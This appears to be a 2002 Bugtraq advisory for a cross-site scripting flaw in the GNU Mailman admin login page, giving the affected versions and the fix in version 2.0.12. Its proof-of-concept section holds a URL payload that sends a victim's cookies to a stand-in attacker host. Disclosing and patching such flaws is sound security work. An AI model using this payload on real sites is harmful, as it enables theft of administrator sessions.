GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability
BID:5299
Info
GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability
| Bugtraq ID: | 5299 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 24 2002 12:00AM |
| Updated: | Jul 24 2002 12:00AM |
| Credit: | Discovery of this issue is credited to office <[email protected]>. |
| Vulnerable: |
GNU Mailman 2.0.11 GNU Mailman 2.0.10 GNU Mailman 2.0.9 GNU Mailman 2.0.8 GNU Mailman 2.0.7 GNU Mailman 2.0.6 GNU Mailman 2.0.5 GNU Mailman 2.0.4 GNU Mailman 2.0.3 GNU Mailman 2.0.2 GNU Mailman 2.0.1 GNU Mailman 2.0 |
| Not Vulnerable: |
GNU Mailman 2.0.12 |
Discussion
GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability
GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.
A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.
This is a variation of the vulnerability described in Bugtraq ID 4825 "GNU Mailman Admin Login Cross-Site Scripting Vulnerability". This variation affects version 2.0.11 of GNU Mailman as well.
GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.
A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.
This is a variation of the vulnerability described in Bugtraq ID 4825 "GNU Mailman Admin Login Cross-Site Scripting Vulnerability". This variation affects version 2.0.11 of GNU Mailman as well.
Exploit / POC
GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability
The following example was provided:
http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);
The following example was provided:
http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);
Solution / Fix
GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability
Solution:
This issue has been address in Mailman version 2.0.12.
GNU Mailman 2.0
GNU Mailman 2.0.1
GNU Mailman 2.0.10
GNU Mailman 2.0.11
GNU Mailman 2.0.2
GNU Mailman 2.0.3
GNU Mailman 2.0.4
GNU Mailman 2.0.5
GNU Mailman 2.0.6
GNU Mailman 2.0.7
GNU Mailman 2.0.8
GNU Mailman 2.0.9
Solution:
This issue has been address in Mailman version 2.0.12.
GNU Mailman 2.0
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.1
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.10
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.11
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.2
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.3
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.4
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.5
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.6
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.7
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.8
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
GNU Mailman 2.0.9
-
GNU mailman-2.0.12.tgz
ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz
References
GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability
References:
References:
- Mailman Homepage (GNU)